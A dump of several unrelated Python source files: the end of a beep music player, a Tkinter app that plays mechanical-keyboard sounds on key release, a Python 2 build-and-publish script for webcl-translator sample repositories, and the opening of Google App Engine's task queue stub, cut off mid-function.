mi = int(re * self.tone_scale * self.tone_scale)
fa = int(mi * self.tone_scale * self.tone_scale)
sol = int(fa * self.tone_scale * self.tone_scale)
la = int(sol * self.tone_scale * self.tone_scale)
si = int(la * self.tone_scale * self.tone_scale)
notes = [0, do, re, mi, fa, sol, la, si]
for item in song_info:
if notes[int(item[0])] == 0:
time.sleep(self.beats / 1000)
else:
self.beep_player.Beep(
int(notes[int(item[0])] * self.pitchs_dict[item[1]]),
int(self.beats * float(item[2:])),
)
|
main.py
|
from tkinter import Tk,Button,Label,Frame,filedialog,ttk,DoubleVar,PhotoImage,RIGHT,LEFT
from keyboard import on_release,wait
from pygame import mixer
from threading import Thread
mixer.init()
tune = mixer.Sound("sound1.mp3")
vol = 1.0
w = Tk()
w.title("Mechvibe v-1.1.2")
track = 0
vibe_vol_value = DoubleVar()
music_vol_value = DoubleVar()
music_vol_value.set(1.0)
vibe_vol_value.set(1.0)
iplay = PhotoImage(file="play.png")
ipause = PhotoImage(file="pause.png")
def vibe_vol_change(e):
mixer.Channel(0).set_volume(vibe_vol_value.get())
def music_vol_change(e):
mixer.Channel(1).set_volume(music_vol_value.get()*0.3)
def tune_():
global tune
def note(a):
mixer.Channel(0).play(tune)
on_release(callback = note)
wait()
def strt():
x= Thread(target=tune_)
x.setDaemon(True)
x.start()
start.grid_forget()
stop.grid(row=1,column=1)
def track_select():
global track
play_.pack_forget()
pause_.pack()
track = mixer.Sound(filedialog.askopenfile(title="select the tune",filetypes=(("mp3 files(bgms recommended)","*.mp3"),)))
mixer.Channel(1).play(track,-1)
def music_play():
global track
if track:
play_.pack_forget()
pause_.pack()
mixer.Channel(1).unpause()
def music_pause():
pause_.pack_forget()
play_.pack()
mixer.Channel(1).pause()
def sound1():
global tune
tune= mixer.Sound("sound1.mp3")
mixer.Channel(0).play(tune)
def sound2():
global tune
tune= mixer.Sound("sound2.mp3")
mixer.Channel(0).play(tune)
def sound3():
global tune
tune= mixer.Sound("sound3.mp3")
mixer.Channel(0).play(tune)
def sound4():
global tune
tune= mixer.Sound("sound4.mp3")
mixer.Channel(0).play(tune)
def custom():
global tune
tune = mixer.Sound(filedialog.askopenfile(title="select the tune",filetypes=(("mp3 files(1 sec recommended)","*.mp3"),)))
#Frames
f4 = Frame(w)
f0 = Frame(f4)
f1 = Frame(f0)
f2 = Frame(f0)
f3 = Frame(f4)
f5 = Frame(w)
f6 = Frame(f5)
f7 = Frame(f5)
#Labels
l1 = Label(w,text="Feel the vibe",font="impact 36 bold")
l2 = Label(f0,text="Vibe")
l3 = Label(f3,text="Vol",width=5)
l4 = Label(f7,text="Music")
l5 = Label(f6,text="Vol",width=5)
#Buttons
b1 = Button(f1,text="tune 1",command = sound1,bd=4,)
b2 = Button(f1,text="tune 2",command= sound2,bd=4)
b3 = Button(f2,text="tune 3",command= sound3,bd=4)
b4 = Button(f2,text="tune 4",command= sound4,bd=4)
b5 = Button(f0,text="add tune",command= custom,bd=4)
b6 = Button(f7,text="browse",command=track_select,bd=4)
play_ =Button(f7,image=iplay,borderwidth=0,command=music_play)
pause_=Button(f7,image=ipause,borderwidth=0,command=music_pause)
start =Button(w,text="START.",font=" impact 20 bold",bg="pale green",command= strt,bd=4)
stop = Button(w,text="STOP",bg="red",font=" impact 20 bold",bd=4,command= lambda : w.destroy())
#Slider
vibeVol = ttk.Scale(f3,from_=1,to=0,orient='vertical',command=vibe_vol_change,variable=vibe_vol_value)
musicVol = ttk.Scale(f6,from_=1,to=0,orient='vertical',command=music_vol_change,variable=music_vol_value)
#layout
l1.grid(row=0,column=1)
l2.pack()
l3.pack(pady=3)
l4.pack()
l5.pack(pady=3)
f0.grid(row=0,column=1)
f1.pack()
f2.pack()
f3.grid(row=0,column=0)
f4.grid(row=1,column=0)
f5.grid(row=1,column=2)
f6.pack(side=RIGHT)
f7.pack(side=LEFT)
musicVol.pack()
b1.pack(side=LEFT)
b2.pack(side=RIGHT)
b3.pack(side=LEFT)
b4.pack(side=RIGHT)
b5.pack()
b6.pack()
play_.pack()
start.grid(row=1,column=1)
vibeVol.pack()
w.iconbitmap("icon.ico")
w.minsize(400,250)
w.resizable(False,False)
w.mainloop()
|
automator.py
|
#!/usr/bin/python
#
# automator.py
# Licence : https://github.com/wolfviking0/webcl-translator/blob/master/LICENSE
#
# Created by Anthony Liot.
# Copyright (c) 2013 Anthony Liot. All rights reserved.
#
import commands
import subprocess
import os
import sys
import multiprocessing
import time
from optparse import OptionParser
from functools import wraps
from time import gmtime, strftime
THREAD = False;
PROF_DATA = {}
def profile(fn):
@wraps(fn)
def with_profiling(*args, **kwargs):
start_time = time.time()
ret = fn(*args, **kwargs)
elapsed_time = time.time() - start_time
if fn.__name__ not in PROF_DATA:
PROF_DATA[fn.__name__] = [0, []]
PROF_DATA[fn.__name__][0] += 1
PROF_DATA[fn.__name__][1].append(elapsed_time)
return ret
return with_profiling
def print_prof_data():
for fname, data in PROF_DATA.items():
max_time = max(data[1])
avg_time = sum(data[1]) / len(data[1])
s, mi = divmod(max_time*1000, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
smax = '%02d:%02d,%03d' % (m,s,mi)
s, mi = divmod(avg_time*1000, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
savg = '%02d:%02d,%03d' % (m,s,mi)
print "Function '%s' called %d times" % (fname, data[0]),
print 'Execution time max: %s, average: %s' % (smax, savg)
def clear_prof_data():
global PROF_DATA
PROF_DATA = {}
list_repositories=["webcl-translator/webcl","webcl-cuda-nvidia","webcl-ocl-nvidia","webcl-osx-sample","webcl-ocltoys","webcl-davibu","webcl-book-samples","webcl-box2d","boost","freeimage"]
page_subfolder=["build_trans","build_cuda","build_nvidia","build_osx","build_toys","build_davibu","build_book","build_box"]
# Go Up folder
os.chdir("../");
# Grab the root folder
root_repositories = os.getcwd() + "/"
# Grab the website folder
page_repositories=os.getcwd() + "/webcl-translator-website/"
def worker_update(online,local,option):
"""thread worker_update function"""
directory = root_repositories + local
print "\tFunction worker 'update' ... "+str(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "/usr/bin/git reset --hard" , cwd = os.path.dirname( root_repositories + local + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
pr = subprocess.Popen( "/usr/bin/git pull" , cwd = os.path.dirname( root_repositories + local + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
pr = subprocess.Popen( "/usr/bin/git clone https://github.com/wolfviking0/"+str(online)+".git "+ option + " " + local, cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
return
@profile
def update(repo_list):
print "\nFunction 'update' ... "+str(repo_list)
jobs = []
for i in repo_list:
#if i.find("webcl-translator/webcl") != -1:
# var = raw_input("\tDo you want force update on the webcl-translator repository ? [y]es / [n]o\n").strip()
# if (var.find("y") == -1):
# continue
p = multiprocessing.Process(target=worker_update, args=(i,i,""))
jobs.append(p)
p.start()
# WebSite
p = multiprocessing.Process(target=worker_update, args=("webcl-translator","webcl-website","-b gh-pages"))
jobs.append(p)
p.start()
for j in jobs:
j.join()
def worker_clean(repo,param):
"""thread worker_clean function"""
directory = root_repositories + repo
print "\tFunction worker 'clean' ... "+str(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "make clean"+param , cwd = os.path.dirname( root_repositories + repo + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
print "/!\ '",directory,"' doesn't exist, call with -u / --update options"
return
@profile
def clean(repo_list,param):
print "\nFunction 'clean' ... "+str(repo_list)
jobs = []
for i in repo_list:
p = multiprocessing.Process(target=worker_clean, args=(i,param,))
jobs.append(p)
p.start()
# Clean folder website
for folder in page_subfolder:
directory = page_repositories + folder
if os.path.isdir(directory):
pr = subprocess.Popen( "rm "+directory+"/*" , cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
print "/!\ Website repo %s doesn't exist ..." % (folder)
for j in jobs:
j.join()
def worker_build(repo,param,id):
"""thread worker_build function"""
directory = root_repositories + repo
print "\tFunction worker 'build' ... "+str(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "make all_"+str(id)+param , cwd = os.path.dirname( root_repositories + repo + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
print "/!\ '",directory,"' doesn't exist, call with -u / --update options"
return
@profile
def build(repo_list,param):
print "\nFunction 'build "+param+"' ... "+str(repo_list)
if THREAD == False:
for i in repo_list:
print "\tFunction no thread 'build' ... "+str(root_repositories + i)
pr = subprocess.Popen( "make"+param , cwd = os.path.dirname( root_repositories + i + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
jobs = []
for i in repo_list:
for j in range(1,4):
p = multiprocessing.Process(target=worker_build, args=(i,param,j,))
jobs.append(p)
p.start()
for j in jobs:
j.join()
def worker_copy(folder,repo):
"""thread worker_copy function"""
directory = page_repositories + folder
print "\tFunction worker 'copy' ... "+str(directory)
if not os.path.exists(directory):
os.mkdir(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "cp -rf "+root_repositories + repo + "/js/ "+directory+"/" , cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
# Update index.html file
f = open(directory+'/index.html','r')
string = ""
while 1:
line = f.readline()
if not line:break
string += line
f.close()
start = string.find('<footer><center>')
end = string.find('</center></footer>')
footer = '<footer><center>webcl-translator is maintained by <a href="https://github.com/wolfviking0">Anthony Liot</a>.<br/>Last update : '+strftime("%Y-%m-%d %H:%M:%S", gmtime())
string = string[:start] + footer + string[end:]
f = open(directory+'/index.html','w')
f.write(string)
f.close()
else:
print "/!\ Website repo %s doesn't exist ..." % (folder)
return
@profile
def copy(repo_list):
print "\nFunction 'copy' ... "+str(repo_list)
jobs = []
for repo in repo_list:
index = list_repositories.index(repo)
folder = page_subfolder[index]
p = multiprocessing.Process(target=worker_copy, args=(folder,repo))
jobs.append(p)
p.start()
for j in jobs:
j.join()
# Update index.html file
f = open(page_repositories+'/index.html','r')
string = ""
while 1:
line = f.readline()
if not line:break
string += line
f.close()
start = string.find('<footer><center>')
end = string.find('</center></footer>')
footer = '<footer><center>webcl-translator is maintained by <a href="https://github.com/wolfviking0">Anthony Liot</a>.<br/>Last update : '+strftime("%Y-%m-%d %H:%M:%S", gmtime())
string = string[:start] + footer + string[end:]
f = open(page_repositories+'/index.html','w')
f.write(string)
f.close()
#pr = subprocess.Popen( "ln -Fs "+page_repositories+"index.html "+root_repositories+"webcl-samples.html", cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
#(out, error) = pr.communicate()
@profile
def launch(parser,options):
global THREAD
THREAD = options.thread
# Multi process
cores = multiprocessing.cpu_count()
# Keep one cores for system
cores -= 1;
# First check if how many option are enabled
num_opt_enabled = 0
for item in options.__dict__:
if options.__dict__[item]:
num_opt_enabled+=1
if (options.thread):
num_opt_enabled-=1
if (options.original):
num_opt_enabled-=1
if (options.debug):
num_opt_enabled-=1
if (options.fastcomp):
num_opt_enabled-=1
if (options.native):
num_opt_enabled-=1
if (len(options.repo) > 0):
num_opt_enabled-=1
# Paramater for makefile
param = ""
if options.fastcomp:
param += " FAST=1 " # Default value inside makefile
else:
param += " FAST=0 "
if options.debug:
param += " DEB=1 "
else:
param += " DEB=0 " # Default value inside makefile
if options.original:
param += " ORIG=1 "
else:
param += " ORIG=0 " # Default value inside makefile
if ( not ( ( all(repo.isdigit() for repo in options.repo) ) and all( ( int(repo) >= 0 and int(repo) <= 6 ) for repo in options.repo) ) ) :
print "/!\ You must use --repo with integer between 0 & 6"
parser.print_help()
exit(-1)
# \todo Need to add the possibility
# Check Error case
if (options.all and num_opt_enabled != 1):
print "/!\ You must use --all alone or with --repo and/or --debug options"
parser.print_help()
exit(-1)
repolist = []
if (len(options.repo) > 0):
for repo in options.repo:
repolist.append(str(list_repositories[int(repo)]))
else :
# Don't update the first by default
for repo in list_repositories[0:-2]:
repolist.append(repo)
# 1 Clone or/and Update all the repositories of sample
if(options.update or options.all):
update(repolist)
os.chdir(root_repositories)
# 2 Clean or Only Clean
if(options.clean or options.all):
clean(repolist,param)
os.chdir(root_repositories)
if options.native:
param = " NAT=1 "
build(repolist,param)
os.chdir(root_repositories)
else:
# 3 Build without validator
if(options.without_validator or options.all):
build(repolist,param)
os.chdir(root_repositories)
# 4 Build with validator
if(options.validator or options.all):
build(repolist," VAL=1" + param)
os.chdir(root_repositories)
# 5 Copy
if(options.copy or options.all):
copy(repolist)
os.chdir(root_repositories)
def list_repo_callback(option, opt, value, parser):
setattr(parser.values, option.dest, value.split(','))
def main():
usage = "usage: %prog [opts]"
parser = OptionParser(usage=usage)
parser.add_option("-a", "--all",
action="store_true", dest="all", default=False,
help="complete process -u -e -w -v -c -p", metavar="ALL")
parser.add_option("-u", "--update",
action="store_true", dest="update", default=False,
help="update the sample repositories", metavar="UPDATE")
parser.add_option("-p", "--profile",
action="store_true", dest="profile", default=False,
help="print the profile log", metavar="PROFILE")
parser.add_option("-o", "--original",
action="store_true", dest="original", default=False,
help="Build using emscripten fork not submodule", metavar="ORIGNAL")
parser.add_option("-v", "--validator",
action="store_true", dest="validator", default=False,
help="Build with webcl-validator enabled", metavar="VALIDATOR")
parser.add_option("-w", "--without-validator",
action="store_true", dest="without_validator", default=False,
help="Build without webcl-validator enabled", metavar="WITHOUT_VALIDATOR")
parser.add_option("-d", "--debug",
action="store_true", dest="debug", default=False,
help="enable all debug flag for webcl-translator", metavar="DEBUG")
parser.add_option("-e", "--erase",
action="store_true", dest="clean", default=False,
help="clean all the javascript generated and build", metavar="CLEAN")
parser.add_option("-c", "--copy",
action="store_true", dest="copy", default=False,
help="copy all the javascript generated after build", metavar="COPY")
parser.add_option("-t", "--thread",
action="store_true", dest="thread", default=False,
help="use thread build", metavar="TREAD")
parser.add_option("-f", "--fastcomp",
action="store_true", dest="fastcomp", default=False,
help="use fastcomp build", metavar="FAST")
parser.add_option("-n", "--native",
action="store_true", dest="native", default=False,
help="use c++ / opencl build", metavar="NAT")
parser.add_option('-r', '--repo',
action='callback', dest="repo", type='string', default='',
callback=list_repo_callback,
help="work only on the repository list :\t\t\t\
0 : webcl-translator/webcl\t\t\t\
1 : webcl-cuda-sample\t\t\t\
2 : webcl-nvidia-sample\t\t\t\
3 : webcl-osx-sample\t\t\t\
4 : webcl-ocltoys\t\t\t\
5 : webcl-davibu\t\t\t\
6 : webcl-book-samples\t\t\t\
7 : webcl-box2d", metavar="0,2,...")
(options, args) = parser.parse_args()
# Launch the different step of the process
launch(parser,options)
# If we want profile
if(options.profile or options.all):
print_prof_data()
if __name__ == "__main__":
main()
|
taskqueue_stub.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stub version of the Task Queue API.
This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.
As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""
from __future__ import with_statement
__all__ = []
import base64
import bisect
import calendar
import datetime
import logging
import os
import random
import string
import threading
import time
import taskqueue_service_pb
import taskqueue
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.api import request_info
from google.appengine.api.taskqueue import taskqueue
from google.appengine.runtime import apiproxy_errors
DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0
DEFAULT_BUCKET_SIZE = 5
MAX_ETA = datetime.timedelta(days=30)
MAX_PULL_TASK_SIZE_BYTES = 2 ** 20
MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)
MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES
MAX_REQUEST_SIZE = 32 << 20
BUILT_IN_HEADERS = set(['x-appengine-queuename',
'x-appengine-taskname',
'x-appengine-taskexecutioncount',
'x-appengine-taskpreviousresponse',
'x-appengine-taskretrycount',
'x-appengine-tasketa',
'x-appengine-development-payload',
'content-length'])
DEFAULT_QUEUE_NAME = 'default'
INF = 1e500
QUEUE_MODE = taskqueue_service_pb.TaskQueueMode
AUTOMATIC_QUEUES = {
DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
'__cron': (1, 1, '1/s')}
def _GetAppId(request):
"""Returns the app id to use for the given request.
Args:
request: A protocol buffer that has an app_id field.
Returns:
A string containing the app id or None if no app id was specified.
"""
if request.has_app_id():
return request.app_id()
else:
return None
def _SecToUsec(t):
"""Converts a time in seconds since the epoch to usec since the epoch.
Args:
t: Time in seconds since the unix epoch
Returns:
An integer containing the number of usec since the unix epoch.
"""
return int(t * 1e6)
def _UsecToSec(t):
"""Converts a time in usec since the epoch to seconds since the epoch.
Args:
t: Time in usec since the unix epoch
Returns:
A float containing the number of seconds since the unix epoch.
"""
return t / 1e6
def _FormatEta(eta_usec):
"""Formats a task ETA as a date string in UTC."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
return eta.strftime('%Y/%m/%d %H:%M:%S')
def _TruncDelta(timedelta):
"""Strips the microseconds field from a timedelta.
Args:
timedelta: a datetime.timedelta.
Returns:
A datetime.timedelta with the microseconds field not filled.
"""
return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)
def _EtaDelta(eta_usec, now):
"""Formats a task ETA as a relative time string."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
if eta > now:
return '%s from now' % _TruncDelta(eta - now)
else:
return '%s ago' % _TruncDelta(now - eta)
def QueryTasksResponseToDict(queue_name, task_response, now):
"""Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.
Args:
queue_name: The name of the queue this task came from.
task_response: An instance of TaskQueueQueryTasksResponse_Task.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A dict containing the fields used by the dev appserver's admin console.
Raises:
ValueError: A task response contains an unknown HTTP method type.
"""
task = {}
task['name'] = task_response.task_name()
task['queue_name'] = queue_name
task['url'] = task_response.url()
method = task_response.method()
if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
task['method'] = 'GET'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
task['method'] = 'POST'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
task['method'] = 'HEAD'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
task['method'] = 'PUT'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
task['method'] = 'DELETE'
else:
raise ValueError('Unexpected method: %d' % method)
task['eta'] = _FormatEta(task_response.eta_usec())
task['eta_usec'] = task_response.eta_usec()
task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
task['body'] = base64.b64encode(task_response.body())
headers = [(header.key(), header.value())
for header in task_response.header_list()
if header.key().lower() not in BUILT_IN_HEADERS]
headers.append(('X-AppEngine-QueueName', queue_name))
headers.append(('X-AppEngine-TaskName', task_response.task_name()))
headers.append(('X-AppEngine-TaskRetryCount',
str(task_response.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task_response.eta_usec()))))
headers.append(('X-AppEngine-Development-Payload', '1'))
headers.append(('Content-Length', str(len(task['body']))))
if 'content-type' not in frozenset(key.lower() for key, _ in headers):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task_response.execution_count())))
if task_response.has_runlog() and task_response.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task_response.runlog().response_code())))
task['headers'] = headers
return task
class _Group(object):
"""A taskqueue group.
This class contains all of the queues for an application.
"""
def __init__(self, queue_yaml_parser=None, app_id=None,
_all_queues_valid=False, _update_newest_eta=None,
_testing_validate_state=False):
"""Constructor.
Args:
queue_yaml_parser: A function that takes no parameters and returns the
parsed results of the queue.yaml file. If this queue is not based on a
queue.yaml file use None.
app_id: The app id this Group is representing or None if it is the
currently running application.
_all_queues_valid: Automatically generate queues on first access.
_update_newest_eta: Callable for automatically executing tasks.
Takes the ETA of the task in seconds since the epoch, the queue_name
and a task name. May be None if automatic task running is disabled.
_testing_validate_state: Should this _Group and all of its _Queues
validate their state after each operation? This should only be used
during testing of the taskqueue_stub.
"""
self._queues = {}
self._queue_yaml_parser = queue_yaml_parser
self._all_queues_valid = _all_queues_valid
self._next_task_id = 1
self._app_id = app_id
if _update_newest_eta is None:
self._update_newest_eta = lambda x: None
else:
self._update_newest_eta = _update_newest_eta
self._testing_validate_state = _testing_validate_state
def GetQueuesAsDicts(self):
"""Gets all the applications's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12,
'acl': ['user1@gmail.com']}, ...]
The list of queues always includes the default queue.
"""
self._ReloadQueuesFromYaml()
now = datetime.datetime.utcnow()
queues = []
for queue_name, queue in sorted(self._queues.items()):
queue_dict = {}
queues.append(queue_dict)
queue_dict['name'] = queue_name
queue_dict['bucket_size'] = queue.bucket_capacity
if queue.user_specified_rate is not None:
queue_dict['max_rate'] = queue.user_specified_rate
else:
queue_dict['max_rate'] = ''
if queue.queue_mode == QUEUE_MODE.PULL:
queue_dict['mode'] = 'pull'
else:
queue_dict['mode'] = 'push'
queue_dict['acl'] = queue.acl
if queue.Oldest():
queue_dict['oldest_task'] = _FormatEta(queue.Oldest())
queue_dict['eta_delta'] = _EtaDelta(queue.Oldest(), now)
else:
queue_dict['oldest_task'] = ''
queue_dict['eta_delta'] = ''
queue_dict['tasks_in_queue'] = queue.Count()
if queue.retry_parameters:
retry_proto = queue.retry_parameters
retry_dict = {}
if retry_proto.has_retry_limit():
retry_dict['retry_limit'] = retry_proto.retry_limit()
if retry_proto.has_age_limit_sec():
retry_dict['age_limit_sec'] = retry_proto.age_limit_sec()
if retry_proto.has_min_backoff_sec():
retry_dict['min_backoff_sec'] = retry_proto.min_backoff_sec()
if retry_proto.has_max_backoff_sec():
retry_dict['max_backoff_sec'] = retry_proto.max_backoff_sec()
if retry_proto.has_max_doublings():
retry_dict['max_doublings'] = retry_proto.max_doublings()
queue_dict['retry_parameters'] = retry_dict
return queues
def HasQueue(self, queue_name):
"""Check if the specified queue_name references a valid queue.
Args:
queue_name: The name of the queue to check.
Returns:
True if the queue exists, False otherwise.
"""
self._ReloadQueuesFromYaml()
return queue_name in self._queues and (
self._queues[queue_name] is not None)
def GetQueue(self, queue_name):
"""Gets the _Queue instance for the specified queue.
Args:
queue_name: The name of the queue to fetch.
Returns:
The _Queue instance for the specified queue.
Raises:
KeyError if the queue does not exist.
"""
self._ReloadQueuesFromYaml()
return self._queues[queue_name]
def GetNextPushTask(self):
"""Finds the task with the lowest eta.
Returns:
A tuple containing the queue and task instance for the task with the
lowest eta, or (None, None) if there are no tasks.
"""
min_eta = INF
result = None, None
for queue in self._queues.itervalues():
if queue.queue_mode == QUEUE_MODE.PULL:
continue
task = queue.OldestTask()
if not task:
continue
if task.eta_usec() < min_eta:
result = queue, task
min_eta = task.eta_usec()
return result
def _ConstructQueue(self, queue_name, *args, **kwargs):
if '_testing_validate_state' in kwargs:
raise TypeError(
'_testing_validate_state should not be passed to _ConstructQueue')
kwargs['_testing_validate_state'] = self._testing_validate_state
self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)
def _ConstructAutomaticQueue(self, queue_name):
if queue_name in AUTOMATIC_QUEUES:
self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
else:
assert self._all_queues_valid
self._ConstructQueue(queue_name)
def _ReloadQueuesFromYaml(self):
"""Update the queue map with the contents of the queue.yaml file.
This function will remove queues that no longer exist in the queue.yaml
file.
If no queue yaml parser has been defined, this function is a no-op.
"""
if not self._queue_yaml_parser:
return
queue_info = self._queue_yaml_parser()
if queue_info and queue_info.queue:
queues = queue_info.queue
else:
queues = []
old_queues = set(self._queues)
new_queues = set()
for entry in queues:
queue_name = entry.name
new_queues.add(queue_name)
retry_parameters = None
if entry.bucket_size:
bucket_size = entry.bucket_size
else:
bucket_size = DEFAULT_BUCKET_SIZE
if entry.retry_parameters:
retry_parameters = queueinfo.TranslateRetryParameters(
entry.retry_parameters)
if entry.mode == 'pull':
mode = QUEUE_MODE.PULL
if entry.rate is not None:
logging.warning(
'Refill rate must not be specified for pull-based queue. '
'Please check queue.yaml file.')
else:
mode = QUEUE_MODE.PUSH
if entry.rate is None:
logging.warning(
'Refill rate must be specified for push-based queue. '
'Please check queue.yaml file.')
max_rate = entry.rate
if entry.acl is not None:
acl = taskqueue_service_pb.TaskQueueAcl()
for acl_entry in entry.acl:
acl.add_user_email(acl_entry.user_email)
else:
acl = None
if self._queues.get(queue_name) is None:
self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
user_specified_rate=max_rate, queue_mode=mode,
acl=acl, retry_parameters=retry_parameters,
target=entry.target)
else:
queue = self._queues[queue_name]
queue.bucket_size = bucket_size
queue.user_specified_rate = max_rate
queue.acl = acl
queue.queue_mode = mode
queue.retry_parameters = retry_parameters
if mode == QUEUE_MODE.PUSH:
eta = queue.Oldest()
if eta:
self._update_newest_eta(_UsecToSec(eta))
if DEFAULT_QUEUE_NAME not in self._queues:
self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)
new_queues.add(DEFAULT_QUEUE_NAME)
if not self._all_queues_valid:
for queue_name in old_queues - new_queues:
del self._queues[queue_name]
def _ValidateQueueName(self, queue_name):
"""Tests if the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name queue of the queue to check.
Returns:
If there are no problems, returns TaskQueueServiceError.OK. Otherwise
returns the correct constant from TaskQueueServiceError.
"""
if not queue_name:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME
elif queue_name not in self._queues:
if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid:
self._ConstructAutomaticQueue(queue_name)
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE
elif self._queues[queue_name] is None:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE
return taskqueue_service_pb.TaskQueueServiceError.OK
def _CheckQueueForRpc(self, queue_name):
"""Ensures the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
queue_name: The name queue of the queue to check
Raises:
ApplicationError: If the queue name is invalid, tombstoned or does not
exist.
"""
self._ReloadQueuesFromYaml()
response = self._ValidateQueueName(queue_name)
if response != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(response)
def _ChooseTaskName(self):
"""Returns a string containing a unique task name."""
self._next_task_id += 1
return 'task%d' % (self._next_task_id - 1)
def _VerifyTaskQueueAddRequest(self, request, now):
"""Checks that a TaskQueueAddRequest is valid.
Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest to validate.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A taskqueue_service_pb.TaskQueueServiceError indicating any problems with
the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is
valid.
"""
if request.eta_usec() < 0:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec()))
max_eta = now + MAX_ETA
if eta > max_eta:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA
queue_name_response = self._ValidateQueueName(request.queue_name())
if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK:
return queue_name_response
if request.has_crontimetable() and self._app_id is None:
return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED
if request.mode() == QUEUE_MODE.PULL:
max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES
else:
max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES
if request.ByteSize() > max_task_size_bytes:
return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE
return taskqueue_service_pb.TaskQueueServiceError.OK
def BulkAdd_Rpc(self, request, response):
"""Add many tasks to a queue using a single request.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
self._ReloadQueuesFromYaml()
if not request.add_request(0).queue_name():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
error_found = False
task_results_with_chosen_names = set()
now = datetime.datetime.utcfromtimestamp(time.time())
for add_request in request.add_request_list():
task_result = response.add_taskresult()
result = self._VerifyTaskQueueAddRequest(add_request, now)
if result == taskqueue_service_pb.TaskQueueServiceError.OK:
if not add_request.task_name():
chosen_name = self._ChooseTaskName()
